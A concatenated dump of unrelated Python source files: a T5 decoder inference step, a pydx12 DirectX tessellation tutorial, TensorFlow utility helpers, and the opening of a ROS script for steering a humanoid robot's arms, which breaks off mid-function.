ctx.encoder_layers_kv = encoder_layers_kv
ctx.decoder_position_bias = dec_pos
ctx.past_kv = past_kv
ctx.encoder_mask = encoder_mask
ctx.step_pos = 0
def decode_step(self,
ctx : T5InferenceContext,
inputs : Union[List[int], np.ndarray]
) -> cupy.ndarray:
past_kv = ctx.past_kv
encoder_layers_kv = ctx.encoder_layers_kv
dec_position_bias = ctx.decoder_position_bias
encoder_mask = ctx.encoder_mask
step_input = inputs
step_pos = ctx.step_pos
ctx.step_pos += 1
barrier = threading.Barrier(2)
load_thread = threading.Thread(target=self.decode_loader, args=(barrier, self.load_stream), daemon=True)
load_thread.start()
with self.device:
calc_stream = self.calc_stream
with calc_stream:
x = self.input_embedding.forward(self.variable_allocator, step_input) # (batch, dim_model)
for i in range(self.num_decoder):
if i % self.overlap_layers == 0:
calc_stream.synchronize()
barrier.wait()
barrier.reset()
# sync
logger.info("Calc decoder layer %d", i)
with calc_stream:
x = self.decoder[i].forward(
self.variable_allocator,
x, # (batch, dim_model)
past_kv[i], # (batch, 2, num_heads, dim_kv, max_decoder_length)
step_pos, # 1
encoder_mask, # (batch, seq_ipt_len)
encoder_layers_kv[:, i], # (batch, 2, num_heads, dim_kv, seq_ipt_len)
dec_position_bias, # (1, num_heads, max_decoder_length, max_decoder_length)
True
)
with calc_stream:
x = self.decoder_final_layer_nrom.forward(self.variable_allocator, x[:, :, cupy.newaxis])[:, :, 0]
x = self.lm_head.forward(self.variable_allocator, x)
calc_stream.synchronize()
load_thread.join()
return x
def _text_to_id(self, sentence):
return self.tokenizer.encode(sentence)
def _id_to_text(self, idx : List[int]):
return self.tokenizer.decode(idx)
def _get_token_id(self, token, use_unk):
token = token.translate(self.tokenizer.translator_enc)
if use_unk:
return self.tokenizer.encoder.get(token, self.tokenizer.unk_id)
else:
return self.tokenizer.encoder.get(token, None)
def _get_id_token(self, idx):
return self.tokenizer.decoder[idx].translate(self.tokenizer.translator_dec)
|
tutorial016.py
|
import time
from pydx12 import *
from utils import get_best_adapter, enable_debug, print_debug, setup_debug, Barrier, Rasterizer, Mesh, GLTF, ResourceBuffer
from PIL import Image
import gc
import sys
import time
import random
import numpy
import threading
from queue import Queue
from pyrr import matrix44
import struct
import math
enable_debug()
device = D3D12CreateDevice(get_best_adapter())
print(device)
setup_debug(device)
print('DEBUG SET')
window = Window('pydx12: Tutorial 015 (Tessellation)', 1024, 1024)
print(window)
command_queue_desc = D3D12_COMMAND_QUEUE_DESC(
Type=D3D12_COMMAND_LIST_TYPE_DIRECT)
queue = device.CreateCommandQueue(command_queue_desc)
swap_chain_desc1 = DXGI_SWAP_CHAIN_DESC1(Format=DXGI_FORMAT_R8G8B8A8_UNORM, BufferUsage=DXGI_USAGE_RENDER_TARGET_OUTPUT,
BufferCount=2, Scaling=DXGI_SCALING_STRETCH, SwapEffect=DXGI_SWAP_EFFECT_FLIP_DISCARD)
swap_chain_desc1.SampleDesc.Count = 1
swap_chain = CreateDXGIFactory2().CreateSwapChainForHwnd(
queue, window, swap_chain_desc1)
descriptor_heap_desc = D3D12_DESCRIPTOR_HEAP_DESC(
Type=D3D12_DESCRIPTOR_HEAP_TYPE_RTV,
NumDescriptors=2)
descriptor_heap = device.CreateDescriptorHeap(descriptor_heap_desc)
rtvs = descriptor_heap.cpu((0, 1))
device.CreateRenderTargetView(swap_chain.GetBuffer(0), None, rtvs[0])
device.CreateRenderTargetView(swap_chain.GetBuffer(1), None, rtvs[1])
mesh = Mesh(device)
mesh.set_index_buffer(bytearray(numpy.array(
[
0, 1, 2, 3
], dtype=numpy.uint16)))
mesh.set_vertex_buffer(bytearray(numpy.array(
[
0, 0, 0,
0, 0, math.pi/2,
0, 0, math.pi,
0, 0, math.pi * 1.5
], dtype=numpy.float32)))
mesh.set_nvertices(4)
rasterizer = Rasterizer(device)
running = True
fps = 0
message_queue = Queue()
tessellation_config = ResourceBuffer(
device, struct.pack('I', 1)) # default to 1
def render_loop():
theta = 0
forward = 0
fence = device.CreateFence()
fence_event = Event()
fence_value = fence.GetCompletedValue()
fence_value += 1
frame_counter = 0
counter = 0
frequency = QueryPerformanceFrequency()
now = QueryPerformanceCounter()
while running:
theta += 0.05
forward = -2 # 10.01
scale = matrix44.create_from_scale((1, 1, 1), dtype='float32')
rotation = matrix44.create_from_y_rotation(theta, dtype='float32')
translation = matrix44.create_from_translation(
(0, 0, forward), dtype='float32')
perspective = matrix44.create_perspective_projection(
60., 1., 0.1, 1000., dtype='float32')
#mesh.matrix = scale @ rotation @ translation @ perspective
mesh.matrix = scale @ rotation @ translation @ perspective
back_buffer_index = swap_chain.GetCurrentBackBufferIndex()
back_buffer = swap_chain.GetBuffer(back_buffer_index)
rasterizer.execute(queue, back_buffer,
rtvs[back_buffer_index], [mesh], tessellation_config)
queue.Signal(fence, fence_value)
if fence.GetCompletedValue() < fence_value:
fence.SetEventOnCompletion(fence_value, fence_event)
fence_event.wait()
fence_value += 1
swap_chain.Present(1)
new_now = QueryPerformanceCounter()
counter += new_now - now
now = new_now
if counter >= frequency:
counter -= frequency
fps = frame_counter
message_queue.put(str(fps))
frame_counter = 1
else:
frame_counter += 1
t = threading.Thread(target=render_loop)
t.start()
while running:
for message, wparam, lparam in window.dequeue():
if message in (WM_QUIT, WM_CLOSE):
running = False
elif message == WM_KEYUP:
if ord('1') <= wparam <= ord('9'):
tessellation_config.resource.upload(struct.pack('I', wparam - ord('0')))
if not message_queue.empty():
new_title = message_queue.get_nowait()
window.set_title(new_title)
running = False
t.join()
print('END')
|
tf_util.py
|
import joblib
import numpy as np
import tensorflow as tf # pylint: ignore-module
import copy
import os
import functools
import collections
import multiprocessing
def switch(condition, then_expression, else_expression):
"""Switches between two operations depending on a scalar value (int or bool).
Note that both `then_expression` and `else_expression`
should be symbolic tensors of the *same shape*.
# Arguments
condition: scalar tensor.
then_expression: TensorFlow operation.
else_expression: TensorFlow operation.
"""
x_shape = copy.copy(then_expression.get_shape())
x = tf.cond(tf.cast(condition, 'bool'),
lambda: then_expression,
lambda: else_expression)
x.set_shape(x_shape)
return x
# ================================================================
# Extras
# ================================================================
def lrelu(x, leak=0.2):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
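# Note (added): f1 * x + f2 * abs(x) equals x for x >= 0 and leak * x for x < 0, i.e. the
# standard leaky ReLU, since f1 + f2 = 1 and f1 - f2 = leak.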
# ================================================================
# Mathematical utils
# ================================================================
def huber_loss(x, delta=1.0):
"""Reference: https://en.wikipedia.org/wiki/Huber_loss"""
return tf.where(
tf.abs(x) < delta,
tf.square(x) * 0.5,
delta * (tf.abs(x) - 0.5 * delta)
)
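# Note (added): piecewise this is 0.5 * x**2 for |x| <= delta and delta * (|x| - 0.5 * delta)
# otherwise; both branches agree at |x| == delta, so the strict comparison above is harmless.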
# ================================================================
# Global session
# ================================================================
def get_session(config=None):
"""Get default session or create one with a given config"""
sess = tf.get_default_session()
if sess is None:
sess = make_session(config=config, make_default=True)
return sess
def make_session(config=None, num_cpu=None, make_default=False, graph=None):
"""Returns a session that will use <num_cpu> CPU's only"""
if num_cpu is None:
num_cpu = int(os.getenv('RCALL_NUM_CPU', multiprocessing.cpu_count()))
if config is None:
config = tf.ConfigProto(
allow_soft_placement=True,
inter_op_parallelism_threads=num_cpu,
intra_op_parallelism_threads=num_cpu)
config.gpu_options.allow_growth = True
if make_default:
return tf.InteractiveSession(config=config, graph=graph)
else:
return tf.Session(config=config, graph=graph)
def single_threaded_session():
"""Returns a session which will only use a single CPU"""
return make_session(num_cpu=1)
def in_session(f):
@functools.wraps(f)
def newfunc(*args, **kwargs):
with tf.Session():
f(*args, **kwargs)
return newfunc
ALREADY_INITIALIZED = set()
def initialize():
"""Initialize all the uninitialized variables in the global scope."""
new_variables = set(tf.global_variables()) - ALREADY_INITIALIZED
get_session().run(tf.variables_initializer(new_variables))
ALREADY_INITIALIZED.update(new_variables)
# ================================================================
# Model components
# ================================================================
def normc_initializer(std=1.0, axis=0):
def _initializer(shape, dtype=None, partition_info=None): # pylint: disable=W0613
out = np.random.randn(*shape).astype(dtype.as_numpy_dtype)
out *= std / np.sqrt(np.square(out).sum(axis=axis, keepdims=True))
return tf.constant(out)
return _initializer
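# Note (added): the initializer above rescales a random normal tensor so that each slice
# along ``axis`` has L2 norm ``std`` (column-normalised initialisation for the default axis=0).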
def conv2d(x, num_filters, name, filter_size=(3, 3), stride=(1, 1), pad="SAME", dtype=tf.float32, collections=None,
summary_tag=None):
with tf.variable_scope(name):
stride_shape = [1, stride[0], stride[1], 1]
filter_shape = [filter_size[0], filter_size[1], int(x.get_shape()[3]), num_filters]
# there are "num input feature maps * filter height * filter width"
# inputs to each hidden unit
fan_in = intprod(filter_shape[:3])
# each unit in the lower layer receives a gradient from:
# "num output feature maps * filter height * filter width" /
# pooling size
fan_out = intprod(filter_shape[:2]) * num_filters
        # initialize weights with the Glorot/Xavier uniform bound: sqrt(6 / (fan_in + fan_out))
w_bound = np.sqrt(6. / (fan_in + fan_out))
w = tf.get_variable("W", filter_shape, dtype, tf.random_uniform_initializer(-w_bound, w_bound),
collections=collections)
b = tf.get_variable("b", [1, 1, 1, num_filters], initializer=tf.zeros_initializer(),
collections=collections)
if summary_tag is not None:
tf.summary.image(summary_tag,
tf.transpose(tf.reshape(w, [filter_size[0], filter_size[1], -1, 1]),
[2, 0, 1, 3]),
max_images=10)
return tf.nn.conv2d(x, w, stride_shape, pad) + b
# ================================================================
# Theano-like Function
# ================================================================
def function(inputs, outputs, updates=None, givens=None):
"""Just like Theano function. Take a bunch of tensorflow placeholders and expressions
computed based on those placeholders and produces f(inputs) -> outputs. Function f takes
values to be fed to the input's placeholders and produces the values of the expressions
in outputs.
Input values can be passed in the same order as inputs or can be provided as kwargs based
on placeholder name (passed to constructor or accessible via placeholder.op.name).
Example:
x = tf.placeholder(tf.int32, (), name="x")
y = tf.placeholder(tf.int32, (), name="y")
z = 3 * x + 2 * y
lin = function([x, y], z, givens={y: 0})
with single_threaded_session():
initialize()
assert lin(2) == 6
assert lin(x=3) == 9
assert lin(2, 2) == 10
assert lin(x=2, y=3) == 12
Parameters
----------
inputs: [tf.placeholder, tf.constant, or object with make_feed_dict method]
list of input arguments
outputs: [tf.Variable] or tf.Variable
list of outputs or a single output to be returned from function. Returned
value will also have the same shape.
updates: [tf.Operation] or tf.Operation
list of update functions or single update function that will be run whenever
the function is called. The return is ignored.
"""
if isinstance(outputs, list):
return _Function(inputs, outputs, updates, givens=givens)
elif isinstance(outputs, (dict, collections.OrderedDict)):
f = _Function(inputs, outputs.values(), updates, givens=givens)
return lambda *args, **kwargs: type(outputs)(zip(outputs.keys(), f(*args, **kwargs)))
else:
f = _Function(inputs, [outputs], updates, givens=givens)
return lambda *args, **kwargs: f(*args, **kwargs)[0]
class _Function(object):
def __init__(self, inputs, outputs, updates, givens):
for inpt in inputs:
if not hasattr(inpt, 'make_feed_dict') and not (type(inpt) is tf.Tensor and len(inpt.op.inputs) == 0):
assert False, "inputs should all be placeholders, constants, or have a make_feed_dict method"
self.inputs = inputs
self.input_names = {inp.name.split("/")[-1].split(":")[0]: inp for inp in inputs}
updates = updates or []
self.update_group = tf.group(*updates)
self.outputs_update = list(outputs) + [self.update_group]
self.givens = {} if givens is None else givens
def _feed_input(self, feed_dict, inpt, value):
if hasattr(inpt, 'make_feed_dict'):
feed_dict.update(inpt.make_feed_dict(value))
else:
feed_dict[inpt] = adjust_shape(inpt, value)
def __call__(self, *args, **kwargs):
assert len(args) + len(kwargs) <= len(self.inputs), "Too many arguments provided"
feed_dict = {}
# Update feed dict with givens.
for inpt in self.givens:
feed_dict[inpt] = adjust_shape(inpt, feed_dict.get(inpt, self.givens[inpt]))
# Update the args
for inpt, value in zip(self.inputs, args):
self._feed_input(feed_dict, inpt, value)
for inpt_name, value in kwargs.items():
self._feed_input(feed_dict, self.input_names[inpt_name], value)
results = get_session().run(self.outputs_update, feed_dict=feed_dict)[:-1]
return results
# ================================================================
# Flat vectors
# ================================================================
def var_shape(x):
out = x.get_shape().as_list()
assert all(isinstance(a, int) for a in out), \
"shape function assumes that shape is fully known"
return out
def numel(x):
return intprod(var_shape(x))
def intprod(x):
return int(np.prod(x))
def flatgrad(loss, var_list, clip_norm=None):
grads = tf.gradients(loss, var_list)
if clip_norm is not None:
grads = [tf.clip_by_norm(grad, clip_norm=clip_norm) for grad in grads]
return tf.concat(axis=0, values=[
tf.reshape(grad if grad is not None else tf.zeros_like(v), [numel(v)])
for (v, grad) in zip(var_list, grads)
])
class SetFromFlat(object):
def __init__(self, var_list, dtype=tf.float32):
assigns = []
shapes = list(map(var_shape, var_list))
total_size = np.sum([intprod(shape) for shape in shapes])
self.theta = theta = tf.placeholder(dtype, [total_size])
start = 0
assigns = []
for (shape, v) in zip(shapes, var_list):
size = intprod(shape)
assigns.append(tf.assign(v, tf.reshape(theta[start:start + size], shape)))
start += size
self.op = tf.group(*assigns)
def __call__(self, theta):
tf.get_default_session().run(self.op, feed_dict={self.theta: theta})
class GetFlat(object):
def __init__(self, var_list):
self.op = tf.concat(axis=0, values=[tf.reshape(v, [numel(v)]) for v in var_list])
def __call__(self):
return tf.get_default_session().run(self.op)
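# Usage sketch (added; ``var_list`` is a hypothetical list of tf.Variable, run inside an
# active session):
#   get_flat, set_from_flat = GetFlat(var_list), SetFromFlat(var_list)
#   theta = get_flat()               # concatenate all variables into one flat vector
#   set_from_flat(theta + update)    # write a modified flat vector back into the variables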
def flattenallbut0(x):
return tf.reshape(x, [-1, intprod(x.get_shape().as_list()[1:])])
# =============================================================
# TF placeholders management
# ============================================================
_PLACEHOLDER_CACHE = {} # name -> (placeholder, dtype, shape)
def get_placeholder(name, dtype, shape):
if name in _PLACEHOLDER_CACHE:
out, dtype1, shape1 = _PLACEHOLDER_CACHE[name]
if out.graph == tf.get_default_graph():
assert dtype1 == dtype and shape1 == shape, \
'Placeholder with name {} has already been registered and has shape {}, different from requested {}'.format(name, shape1, shape)
return out
out = tf.placeholder(dtype=dtype, shape=shape, name=name)
_PLACEHOLDER_CACHE[name] = (out, dtype, shape)
return out
def get_placeholder_cached(name):
return _PLACEHOLDER_CACHE[name][0]
# ================================================================
# Diagnostics
# ================================================================
def display_var_info(vars):
from baselines import logger
count_params = 0
for v in vars:
name = v.name
if "/Adam" in name or "beta1_power" in name or "beta2_power" in name: continue
v_params = np.prod(v.shape.as_list())
count_params += v_params
if "/b:" in name or "/bias" in name: continue # Wx+b, bias is not interesting to look at => count params, but not print
logger.info(" %s%s %i params %s" % (name, " "*(55-len(name)), v_params, str(v.shape)))
logger.info("Total model parameters: %0.2f million" % (count_params*1e-6))
def get_available_gpus():
# recipe from here:
# https://stackoverflow.com/questions/38559755/how-to-get-current-available-gpus-in-tensorflow?utm_medium=organic&utm_source=google_rich_qa&utm_campaign=google_rich_qa
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
return [x.name for x in local_device_protos if x.device_type == 'GPU']
# ================================================================
# Saving variables
# ================================================================
def load_state(fname, sess=None):
from baselines import logger
logger.warn('load_state method is deprecated, please use load_variables instead')
sess = sess or get_session()
saver = tf.train.Saver()
saver.restore(tf.get_default_session(), fname)
def save_state(fname, sess=None):
from baselines import logger
logger.warn('save_state method is deprecated, please use save_variables instead')
sess = sess or get_session()
dirname = os.path.dirname(fname)
if any(dirname):
os.makedirs(dirname, exist_ok=True)
saver = tf.train.Saver()
saver.save(tf.get_default_session(), fname)
# The methods above and below are clearly doing the same thing, and in a rather similar way
# TODO: ensure there is no subtle differences and remove one
def save_variables(save_path, variables=None, sess=None):
sess = sess or get_session()
variables = variables or tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)
ps = sess.run(variables)
save_dict = {v.name: value for v, value in zip(variables, ps)}
dirname = os.path.dirname(save_path)
if any(dirname):
os.makedirs(dirname, exist_ok=True)
joblib.dump(save_dict, save_path)
def load_variables(load_path, variables=None, sess=None):
sess = sess or get_session()
variables = variables or tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)
loaded_params = joblib.load(os.path.expanduser(load_path))
restores = []
if isinstance(loaded_params, list):
assert len(loaded_params) == len(variables), 'number of variables loaded mismatches len(variables)'
for d, v in zip(loaded_params, variables):
restores.append(v.assign(d))
else:
for v in variables:
if v.name.startswith('ddpg'):
restores.append(v.assign(loaded_params[v.name]))
sess.run(restores)
# ================================================================
# Shape adjustment for feeding into tf placeholders
# ================================================================
def adjust_shape(placeholder, data):
'''
adjust shape of the data to the shape of the placeholder if possible.
If shape is incompatible, AssertionError is thrown
Parameters:
placeholder tensorflow input placeholder
data input data to be (potentially) reshaped to be fed into placeholder
Returns:
reshaped data
'''
if not isinstance(data, np.ndarray) and not isinstance(data, list):
return data
if isinstance(data, list):
data = np.array(data)
placeholder_shape = [x or -1 for x in placeholder.shape.as_list()]
assert _check_shape(placeholder_shape, data.shape), \
'Shape of data {} is not compatible with shape of the placeholder {}'.format(data.shape, placeholder_shape)
return np.reshape(data, placeholder_shape)
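# Illustrative example: a placeholder of shape [None, 4] accepts a flat list of four floats;
# adjust_shape reshapes it to (1, 4) before feeding:
#   ph = tf.placeholder(tf.float32, [None, 4])
#   adjust_shape(ph, [0.1, 0.2, 0.3, 0.4]).shape  # -> (1, 4)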
def _check_shape(placeholder_shape, data_shape):
    ''' check if two shapes are compatible (i.e. differ only by dimensions of size 1, or by the batch dimension)'''
    return True  # NOTE: the strict check below is currently disabled; all shapes are accepted as-is
squeezed_placeholder_shape = _squeeze_shape(placeholder_shape)
squeezed_data_shape = _squeeze_shape(data_shape)
for i, s_data in enumerate(squeezed_data_shape):
s_placeholder = squeezed_placeholder_shape[i]
if s_placeholder != -1 and s_data != s_placeholder:
return False
return True
def _squeeze_shape(shape):
return [x for x in shape if x != 1]
# ================================================================
# Tensorboard interfacing
# ================================================================
def launch_tensorboard_in_background(log_dir):
'''
To log the Tensorflow graph when using rl-algs
algorithms, you can run the following code
in your main script:
import threading, time
def start_tensorboard(session):
time.sleep(10) # Wait until graph is setup
tb_path = osp.join(logger.get_dir(), 'tb')
summary_writer = tf.summary.FileWriter(tb_path, graph=session.graph)
summary_op = tf.summary.merge_all()
launch_tensorboard_in_background(tb_path)
session = tf.get_default_session()
t = threading.Thread(target=start_tensorboard, args=([session]))
t.start()
'''
import subprocess
subprocess.Popen(['tensorboard', '--logdir', log_dir])
|
steering_simulation_old_hand.py
|
## @package steering
# Documentation for this module.
#
# Control of Roboy's shoulders, elbows and wrists for steering.
# In order to reach the requested steering-angle we target intermediate points
# between the current and the requested steering-angle to ensure Roboy's hands
# are following the captured steering-trajectory.
#
# In order to target a point on the steering-trajectory for the hands,
# we use an interpolation-function for the joint angles with steering-angle as input
# that uses precomputed set-points of all joint-angles
# according to a certain steering-angle.
from __future__ import print_function
import json
import time
from threading import Thread
import numpy as np
import numpy.polynomial.polynomial as poly
import rospy
from roboy_control_msgs.srv import SetControllerParameters
from roboy_simulation_msgs.msg import JointState
from scipy import interpolate
from std_msgs.msg import Float32, String, Float64
PRINT_DEBUG = True
RECORDED_TRAJECTORY_FILENAME = "trajectory_steering/steering_trajectory.json"
JOINT_TARGET_ERROR_TOLERANCE = 0.01
UPDATE_FREQUENCY = 0.001
MAX_ANGLE_CHANGE = np.pi / 72
STEP_TRANSITION_TIME = 2.5
JOINT_SHOULDER_AXIS0_RIGHT = "right_shoulder_axis0"
JOINT_SHOULDER_AXIS1_RIGHT = "right_shoulder_axis1"
JOINT_SHOULDER_AXIS2_RIGHT = "right_shoulder_axis2"
JOINT_SHOULDER_AXIS0_LEFT = "left_shoulder_axis0"
JOINT_SHOULDER_AXIS1_LEFT = "left_shoulder_axis1"
JOINT_SHOULDER_AXIS2_LEFT = "left_shoulder_axis2"
JOINT_ELBOW_ROT0_RIGHT = "elbow_right_rot0"
JOINT_ELBOW_ROT1_RIGHT = "elbow_right_rot1"
JOINT_ELBOW_ROT0_LEFT = "elbow_left_rot0"
JOINT_ELBOW_ROT1_LEFT = "elbow_left_rot1"
JOINT_WRIST_0_RIGHT = "right_wrist_0"
JOINT_WRIST_1_RIGHT = "right_wrist_1"
JOINT_WRIST_0_LEFT = "left_wrist_0"
JOINT_WRIST_1_LEFT = "left_wrist_1"
JOINT_BIKE_FRONT = "joint_front"
_joints_list = [JOINT_SHOULDER_AXIS0_RIGHT, JOINT_SHOULDER_AXIS1_RIGHT, JOINT_SHOULDER_AXIS2_RIGHT,
JOINT_SHOULDER_AXIS0_LEFT, JOINT_SHOULDER_AXIS1_LEFT, JOINT_SHOULDER_AXIS2_LEFT,
JOINT_ELBOW_ROT0_RIGHT, JOINT_ELBOW_ROT1_RIGHT, JOINT_ELBOW_ROT0_LEFT, JOINT_ELBOW_ROT1_LEFT,
JOINT_WRIST_0_RIGHT, JOINT_WRIST_1_RIGHT, JOINT_WRIST_0_LEFT, JOINT_WRIST_1_LEFT, JOINT_BIKE_FRONT]
_numTrajectoryPoints = 0
_trajectorySteering = []
_trajectoryShoulder0Right = []
_trajectoryShoulder1Right = []
_trajectoryShoulder2Right = []
_trajectoryShoulder0Left = []
_trajectoryShoulder1Left = []
_trajectoryShoulder2Left = []
_trajectoryElbow0Right = []
_trajectoryElbow1Right = []
_trajectoryElbow0Left = []
_trajectoryElbow1Left = []
_trajectoryWrist0Right = []
_trajectoryWrist1Right = []
_trajectoryWrist0Left = []
_trajectoryWrist1Left = []
_interpolatedShoulder0Right = None
_interpolatedShoulder1Right = None
_interpolatedShoulder2Right = None
_interpolatedShoulder0Left = None
_interpolatedShoulder1Left = None
_interpolatedShoulder2Left = None
_interpolatedElbow0Right = None
_interpolatedElbow1Right = None
_interpolatedElbow0Left = None
_interpolatedElbow1Left = None
_interpolatedWrist0Right = None
_interpolatedWrist1Right = None
_interpolatedWrist0Left = None
_interpolatedWrist1Left = None
_regressedShoulder0Right = None
_regressedShoulder1Right = None
_regressedShoulder2Right = None
_regressedShoulder0Left = None
_regressedShoulder1Left = None
_regressedShoulder2Left = None
_regressedElbow0Right = None
_regressedElbow1Right = None
_regressedElbow0Left = None
_regressedElbow1Left = None
_regressedWrist0Right = None
_regressedWrist1Right = None
_regressedWrist0Left = None
_regressedWrist1Left = None
_jointsStatusData = {
JOINT_SHOULDER_AXIS0_RIGHT: {
"Pos": 0.0,
"Vel": 0.0
},
JOINT_SHOULDER_AXIS1_RIGHT: {
"Pos": 0.0,
"Vel": 0.0
},
JOINT_SHOULDER_AXIS2_RIGHT: {
"Pos": 0.0,
"Vel": 0.0
},
JOINT_SHOULDER_AXIS0_LEFT: {
"Pos": 0.0,
"Vel": 0.0
},
JOINT_SHOULDER_AXIS1_LEFT: {
"Pos": 0.0,
"Vel": 0.0
},
JOINT_SHOULDER_AXIS2_LEFT: {
"Pos": 0.0,
"Vel": 0.0
},
JOINT_ELBOW_ROT0_RIGHT: {
"Pos": 0.0,
"Vel": 0.0
},
JOINT_ELBOW_ROT1_RIGHT: {
"Pos": 0.0,
"Vel": 0.0
},
JOINT_ELBOW_ROT0_LEFT: {
"Pos": 0.0,
"Vel": 0.0
},
JOINT_ELBOW_ROT1_LEFT: {
"Pos": 0.0,
"Vel": 0.0
},
JOINT_WRIST_0_RIGHT: {
"Pos": 0.0,
"Vel": 0.0
},
JOINT_WRIST_1_RIGHT: {
"Pos": 0.0,
"Vel": 0.0
},
JOINT_WRIST_0_LEFT: {
"Pos": 0.0,
"Vel": 0.0
},
JOINT_WRIST_1_LEFT: {
"Pos": 0.0,
"Vel": 0.0
}
}
ros_right_shoulder_axis0_pub = rospy.Publisher('/right_shoulder_axis0/right_shoulder_axis0/target', Float32,
queue_size=2)
ros_right_shoulder_axis1_pub = rospy.Publisher('/right_shoulder_axis1/right_shoulder_axis1/target', Float32,
queue_size=2)
ros_right_shoulder_axis2_pub = rospy.Publisher('/right_shoulder_axis2/right_shoulder_axis2/target', Float32,
queue_size=2)
ros_left_shoulder_axis0_pub = rospy.Publisher('/left_shoulder_axis0/left_shoulder_axis0/target', Float32, queue_size=2)
ros_left_shoulder_axis1_pub = rospy.Publisher('/left_shoulder_axis1/left_shoulder_axis1/target', Float32, queue_size=2)
ros_left_shoulder_axis2_pub = rospy.Publisher('/left_shoulder_axis2/left_shoulder_axis2/target', Float32, queue_size=2)
ros_elbow_right_rot0_pub = rospy.Publisher('/elbow_right_rot0/elbow_right_rot0/target', Float32, queue_size=2)
ros_elbow_right_rot1_pub = rospy.Publisher('/elbow_right_rot1/elbow_right_rot1/target', Float32, queue_size=2)
ros_elbow_left_rot0_pub = rospy.Publisher('/elbow_left_rot0/elbow_left_rot0/target', Float32, queue_size=2)
ros_elbow_left_rot1_pub = rospy.Publisher('/elbow_left_rot1/elbow_left_rot1/target', Float32, queue_size=2)
ros_right_wrist_0_pub = rospy.Publisher('/right_wrist_0/right_wrist_0/target', Float32, queue_size=2)
ros_right_wrist_1_pub = rospy.Publisher('/right_wrist_1/right_wrist_1/target', Float32, queue_size=2)
ros_left_wrist_0_pub = rospy.Publisher('/left_wrist_0/left_wrist_0/target', Float32, queue_size=2)
ros_left_wrist_1_pub = rospy.Publisher('/left_wrist_1/left_wrist_1/target', Float32, queue_size=2)
ros_bike_front_pub = rospy.Publisher('/joint_front/joint_front/target', Float32, queue_size=2)
ros_log_error_pub = rospy.Publisher('chatter', String, queue_size=10)
requested_steering_angle = 0
angle_change_successful = True
## Documentation for a function.
#
# This function collects the current status of the joint-angles and saves
# them in the global dictionary "_jointsStatusData".
def joint_state_callback(joint_data):
global _jointsStatusData
# Assert order of joints
for stringIter in range(len(joint_data.names)):
if joint_data.names[stringIter] in _jointsStatusData:
_jointsStatusData[joint_data.names[stringIter]]["Pos"] = joint_data.q[stringIter]
_jointsStatusData[joint_data.names[stringIter]]["Vel"] = joint_data.qd[stringIter]
## Documentation for a function.
#
# Returns the current position of the joint-angle @joint_name.
def get_joint_position(joint_name):
global _jointsStatusData
    return _jointsStatusData[joint_name]["Pos"]
## Documentation for a function.
#
# Initializes the interpolation-functions for every joint-angle using regression.
# The input value of the function is a steering angle and the output value of the function
# is the corresponding joint angle.
#
# The functions can be used by calling "<function_name>(<steering_angle>)"
# ==> returns <joint_angle>
def regress_joint_positions_from_file(filename):
global _trajectorySteering
global _trajectoryShoulder0Right
global _trajectoryShoulder1Right
global _trajectoryShoulder2Right
global _trajectoryShoulder0Left
global _trajectoryShoulder1Left
global _trajectoryShoulder2Left
global _trajectoryElbow0Right
global _trajectoryElbow1Right
global _trajectoryElbow0Left
global _trajectoryElbow1Left
global _trajectoryWrist0Right
global _trajectoryWrist1Right
global _trajectoryWrist0Left
global _trajectoryWrist1Left
global _regressedShoulder0Right
global _regressedShoulder1Right
global _regressedShoulder2Right
global _regressedShoulder0Left
global _regressedShoulder1Left
global _regressedShoulder2Left
global _regressedElbow0Right
global _regressedElbow1Right
global _regressedElbow0Left
global _regressedElbow1Left
global _regressedWrist0Right
global _regressedWrist1Right
global _regressedWrist0Left
global _regressedWrist1Left
loaded_data = None
with open(filename, "r") as read_file:
loaded_data = json.load(read_file)
_regressedShoulder0Right = poly.Polynomial(loaded_data[JOINT_SHOULDER_AXIS0_RIGHT])
_regressedShoulder1Right = poly.Polynomial(loaded_data[JOINT_SHOULDER_AXIS1_RIGHT])
_regressedShoulder2Right = poly.Polynomial(loaded_data[JOINT_SHOULDER_AXIS2_RIGHT])
_regressedElbow0Right = poly.Polynomial(loaded_data[JOINT_ELBOW_ROT0_RIGHT])
_regressedElbow1Right = poly.Polynomial(loaded_data[JOINT_ELBOW_ROT1_RIGHT])
_regressedWrist0Right = poly.Polynomial(loaded_data[JOINT_WRIST_0_RIGHT])
_regressedWrist1Right = poly.Polynomial(loaded_data[JOINT_WRIST_1_RIGHT])
_regressedShoulder0Left = poly.Polynomial(loaded_data[JOINT_SHOULDER_AXIS0_LEFT])
_regressedShoulder1Left = poly.Polynomial(loaded_data[JOINT_SHOULDER_AXIS1_LEFT])
_regressedShoulder2Left = poly.Polynomial(loaded_data[JOINT_SHOULDER_AXIS2_LEFT])
_regressedElbow0Left = poly.Polynomial(loaded_data[JOINT_ELBOW_ROT0_LEFT])
_regressedElbow1Left = poly.Polynomial(loaded_data[JOINT_ELBOW_ROT1_LEFT])
_regressedWrist0Left = poly.Polynomial(loaded_data[JOINT_WRIST_0_LEFT])
_regressedWrist1Left = poly.Polynomial(loaded_data[JOINT_WRIST_1_LEFT])
return 1
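# Illustrative call (the filename is the one used in main() below): after
#   regress_joint_positions_from_file("trajectory_steering/saved_coefficients.json")
# every _regressed* global holds a numpy Polynomial, so e.g. _regressedElbow0Left(steering_angle)
# evaluates the fitted elbow joint angle for that steering angle.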
## Documentation for a function.
#
# Collects and saves all joint- and steering-angles from the pre-captured
# trajectory from the @read_file (global variable).
def import_joint_trajectory_record():
global _trajectorySteering
global _trajectoryShoulder0Right
global _trajectoryShoulder1Right
global _trajectoryShoulder2Right
global _trajectoryShoulder0Left
global _trajectoryShoulder1Left
global _trajectoryShoulder2Left
global _trajectoryElbow0Right
global _trajectoryElbow1Right
global _trajectoryElbow0Left
global _trajectoryElbow1Left
global _trajectoryWrist0Right
global _trajectoryWrist1Right
global _trajectoryWrist0Left
global _trajectoryWrist1Left
    global _numTrajectoryPoints
    global PRINT_DEBUG
with open(RECORDED_TRAJECTORY_FILENAME, "r") as read_file:
loaded_data = json.load(read_file)
        if loaded_data.get("num_points") is None:
return 0
else:
_numTrajectoryPoints = loaded_data["num_points"]
for pointIterator in range(_numTrajectoryPoints):
if "point_" + str(pointIterator) in loaded_data:
_trajectorySteering.append(loaded_data["point_" + str(pointIterator)]["Right"]["Steering_angle"])
_trajectoryShoulder0Right.append(
